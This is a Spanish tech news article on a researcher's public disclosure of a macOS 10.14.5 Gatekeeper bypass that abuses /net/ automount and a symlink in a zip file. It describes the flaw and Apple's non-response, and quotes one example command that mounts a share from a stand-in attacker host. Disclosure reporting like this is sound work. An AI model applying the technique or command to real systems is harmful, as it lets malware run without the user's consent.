Anuncio cerrado

El investigador de seguridad Filippo Cavallarin publicó una advertencia sobre el error en macOS 10.14.5 en su blog. Consiste en la posibilidad de saltarse por completo las medidas de seguridad de Gatekeeper. Según Cavallarin, ya señaló el error a Apple en febrero de este año, pero la compañía no lo solucionó en la última actualización.

Gatekeeper fue desarrollado por Apple e incorporado a su sistema operativo de escritorio por primera vez en 2012. Se trata de un mecanismo que impide que una aplicación se ejecute sin el conocimiento y consentimiento del usuario. Después de descargar una aplicación, Gatekeeper verifica automáticamente su código para ver si el software está firmado correctamente por Apple.

En su publicación de blog, Cavallarin señala que Gatekeeper, de forma predeterminada, considera que tanto el almacenamiento externo como los recursos compartidos de red son ubicaciones seguras. Por lo tanto, cualquier aplicación que resida en estos destinos puede iniciarse automáticamente sin tener que pasar por la verificación Gatekeeper. Es esta característica la que puede aprovecharse para iniciar software malicioso sin el conocimiento del usuario.

Un aspecto que permite el acceso no autorizado es la función de montaje automático, que permite a los usuarios montar automáticamente un recurso compartido de red simplemente especificando una ruta que comienza con "/net/". Como ejemplo, Cavallarin cita la ruta "ls /net/evil-attacker.com/sharedfolder/" que puede hacer que el sistema operativo cargue el contenido de una carpeta "sharefolder" en una ubicación remota que puede ser potencialmente maliciosa.

Puedes ver cómo funciona la amenaza en el vídeo:

Otro factor es el hecho de que si se comparte un archivo zip que contiene un enlace simbólico específico que conduce a la función de montaje automático, Gatekeeper no lo comprobará. De esta manera, la víctima puede descargar fácilmente el archivo malicioso y descomprimirlo, lo que permite al atacante ejecutar prácticamente cualquier software en Mac sin el conocimiento del usuario. El Finder, que oculta ciertas extensiones de forma predeterminada, también tiene su parte de esta vulnerabilidad.

Cavallarin afirma en su blog que Apple llamó la atención sobre la vulnerabilidad del sistema operativo macOS el 22 de febrero de este año. Pero a mediados de mayo, Apple dejó de comunicarse con Cavallarin, por lo que Cavallarin decidió hacer público todo el asunto.

kit-buscador-mac

Fuente: FCVL

.